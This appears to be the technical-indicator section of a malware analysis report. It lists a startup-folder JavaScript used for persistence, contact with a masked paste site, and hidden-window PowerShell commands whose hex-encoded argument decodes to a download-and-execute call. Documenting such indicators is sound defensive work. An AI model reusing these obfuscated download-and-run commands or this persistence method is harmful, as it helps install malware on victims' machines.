Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\s.js
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $HaCkVwYlwNKAoFJVnwxt='69 65 78 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 53 74 72 69 6e 67 28 27 68 74 74...' (with hidden window)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\s.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $HaCkVwYlwNKAoFJVnwxt='69 65 78 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 53 74 72 69 6e 67 28 27 68 74 74...